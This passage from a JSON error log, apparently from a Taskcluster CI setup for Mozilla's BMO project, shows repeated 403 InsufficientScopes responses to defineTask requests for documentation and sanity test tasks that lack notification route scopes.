\\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"XzF7B--6Soeyh-2-Czy6uA\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"Doc\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"docs\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"1f36a82d520dd8a05326c222fff5152e10a716ab\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"dylanwh\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"93826b5e5289cef8b6b15ba630fe522d236e9933\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"dylan@hardison.net\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Documentation Build Test\\\",\\n    \\\"description\\\": \\\"Documentation Build Test\\\",\\n    \\\"owner\\\": \\\"dylan@hardison.net\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-27T02:16:26.166Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-28T02:16:26.166Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"Kgim6VDJR4KCRicihcOUZw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-28T02:16:26.166Z\\\"\\n}\\n  time:     2016-09-27T02:16:26.481Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"XzF7B--6Soeyh-2-Czy6uA\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.dylan@hardison.net.on-any\",\n                        \"notify.irc-channel.#bteam.on-failed\",\n                        \"notify.irc-channel.#bteam.on-exception\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"symbol\": \"Doc\",\n                            \"machine\": {\n                                \"platform\": \"linux64\",\n                                \"build\": {\n                                    \"platform\": \"linux64\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"reruns\": 3,\n                        \"image\": \"mozillabteam/bmo-ci\",\n                        \"command\": [\n                            \"runtests.sh\"\n                        ],\n                        \"env\": {\n                            \"TEST_SUITE\": \"docs\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"development\",\n                            \"GITHUB_BASE_SHA\": \"1f36a82d520dd8a05326c222fff5152e10a716ab\",\n                            \"GITHUB_BASE_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_HEAD_USER\": \"dylanwh\",\n                            \"GITHUB_HEAD_SHA\": \"93826b5e5289cef8b6b15ba630fe522d236e9933\",\n                            \"GITHUB_HEAD_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"dylan@hardison.net\"\n                        },\n                        \"artifacts\": {\n                            \"public/runtests_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/runtests.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            }\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Documentation Build Test\",\n                        \"description\": \"Documentation Build Test\",\n                        \"owner\": \"dylan@hardison.net\",\n                        \"source\": \"https://github.com/mozilla-bteam/bmo.git\"\n                    },\n                    \"created\": \"2016-09-27T02:16:26.166Z\",\n                    \"deadline\": \"2016-09-28T02:16:26.166Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"Kgim6VDJR4KCRicihcOUZw\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-28T02:16:26.166Z\"\n                },\n                \"time\": \"2016-09-27T02:16:26.481Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.dylan@hardison.net.on-any\",\n                        \"queue:route:notify.irc-channel.#bteam.on-failed\",\n                        \"queue:route:notify.irc-channel.#bteam.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-bteam/bmo:branch:development\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:define-task:aws-provisioner-v1/b2gtest\",\n                    \"queue:route:gaia-taskcluster\",\n                    \"queue:route:index.garbage.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.bmo-development.*\",\n                    \"queue:route:tc-treeherder.bmo-master.*\",\n                    \"queue:route:tc-treeherder.bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"IzhxnyHHTK-hf7cJPkxZWQ\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"San\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"sanity\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"1f36a82d520dd8a05326c222fff5152e10a716ab\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"dylanwh\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"93826b5e5289cef8b6b15ba630fe522d236e9933\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"dylan@hardison.net\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Basic Sanity Tests\\\",\\n    \\\"description\\\": \\\"Basic Sanity Tests\\\",\\n    \\\"owner\\\": \\\"dylan@hardison.net\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-27T02:16:26.166Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-28T02:16:26.166Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"Kgim6VDJR4KCRicihcOUZw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-28T02:16:26.166Z\\\"\\n}\\n  time:     2016-09-27T02:16:26.546Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"IzhxnyHHTK-hf7cJPkxZWQ\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"San\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"sanity\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"1f36a82d520dd8a05326c222fff5152e10a716ab\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"dylanwh\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"93826b5e5289cef8b6b15ba630fe522d236e9933\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"dylan@hardison.net\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Basic Sanity Tests\\\",\\n    \\\"description\\\": \\\"Basic Sanity Tests\\\",\\n    \\\"owner\\\": \\\"dylan@hardison.net\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-27T02:16:26.166Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-28T02:16:26.166Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"Kgim6VDJR4KCRicihcOUZw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-28T02:16:26.166Z\\\"\\n}\\n  time:     2016-09-27T02:16:26.546Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"IzhxnyHHTK-hf7cJPkxZWQ\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.dylan@hardison.net.on-any\",\n                        \"notify.irc-channel.#bteam.on-failed\",\n                        \"notify.irc-channel.#bteam.on-exception\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"symbol\": \"San\",\n                            \"machine\": {\n                                \"platform\": \"linux64\",\n                                \"build\": {\n                                    \"platform\": \"linux64\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"reruns\": 3,\n                        \"image\": \"mozillabteam/bmo-ci\",\n                        \"command\": [\n                            \"runtests.sh\"\n                        ],\n                        \"env\": {\n                            \"TEST_SUITE\": \"sanity\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"development\",\n                            \"GITHUB_BASE_SHA\": \"1f36a82d520dd8a05326c222fff5152e10a716ab\",\n                            \"GITHUB_BASE_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_HEAD_USER\": \"dylanwh\",\n                            \"GITHUB_HEAD_SHA\": \"93826b5e5289cef8b6b15ba630fe522d236e9933\",\n                            \"GITHUB_HEAD_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"dylan@hardison.net\"\n                        },\n                        \"artifacts\": {\n                            \"public/runtests_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/runtests.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            }\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Basic Sanity Tests\",\n                        \"description\": \"Basic Sanity Tests\",\n                        \"owner\": \"dylan@hardison.net\",\n                        \"source\": \"https://github.com/mozilla-bteam/bmo.git\"\n                    },\n                    \"created\": \"2016-09-27T02:16:26.166Z\",\n                    \"deadline\": \"2016-09-28T02:16:26.166Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"Kgim6VDJR4KCRicihcOUZw\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-28T02:16:26.166Z\"\n                },\n                \"time\": \"2016-09-27T02:16:26.546Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.dylan@hardison.net.on-any\",\n                        \"queue:route:notify.irc-channel.#bteam.on-failed\",\n                        \"queue:route:notify.irc-channel.#bteam.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-bteam/bmo:branch:development\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:define-task:aws-provisioner-v1/b2gtest\",\n                    \"queue:route:gaia-taskcluster\",\n                    \"queue:route:index.garbage.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.bmo-development.*\",\n                    \"queue:route:tc-treeherder.bmo-master.*\",\n                    \"queue:route:tc-treeherder.bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - 